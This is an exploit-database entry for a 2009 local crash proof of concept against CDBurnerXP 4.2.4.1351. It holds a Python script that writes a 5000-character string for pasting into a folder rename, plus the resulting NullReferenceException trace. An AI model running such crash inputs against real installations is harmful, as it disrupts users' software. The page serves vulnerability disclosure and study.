header-logo
Suggest Exploit
vendor:
CDBurnerXP
by:
Dr_IDE
7.8
CVSS
HIGH
Null Reference Exception
476
CWE
Product Name: CDBurnerXP
Affected Version From: 4.2.4.1351
Affected Version To: 4.2.4.1351
Patch Exists: NO
Related CWE: N/A
CPE: a:cdburnerxp:cdburnerxp:4.2.4.1351
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3, Windows 7 RC
2009

CDBurnerXP v 4.2.4.1351 Local Crash PoC

CDBurnerXP v 4.2.4.1351 is vulnerable to a local crash due to a Null Reference Exception. This vulnerability can be triggered by creating a new data disc, adding a folder, pasting to rename the folder, and clicking 'Save Compilation as ISO'. The crash occurs due to a lack of proper input validation when handling user-supplied data.

Mitigation:

Input validation should be implemented to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

#!/usr/bin/env python

####################################################################################
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3, 7RC
# Usage:	Create New Data Disc, Add a Folder, Paste to Rename Folder, Click Save Compilation as ISO
# Notes:	Super lame and most likely not exploitable.
#
####################################################################################

'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an object.
   at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
   at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender, EventArgs e)
   at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
   at System.Windows.Forms.MenuItem.MenuItemData.Execute()
   at System.Windows.Forms.Command.Invoke()
   at System.Windows.Forms.Command.DispatchID(Int32 id)
   at System.Windows.Forms.Control.WmCommand(Message& m)
   at System.Windows.Forms.Control.WndProc(Message& m)
   at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
   at System.Windows.Forms.ContainerControl.WndProc(Message& m)
   at System.Windows.Forms.Form.WndProc(Message& m)
   at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
   at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
'''

buff = ("\x41" * 5000)

f1 = open("cdburnerxp.txt","w")
f1.write(buff)
f1.close()

Navigation

Suggest Exploit

Services By CQR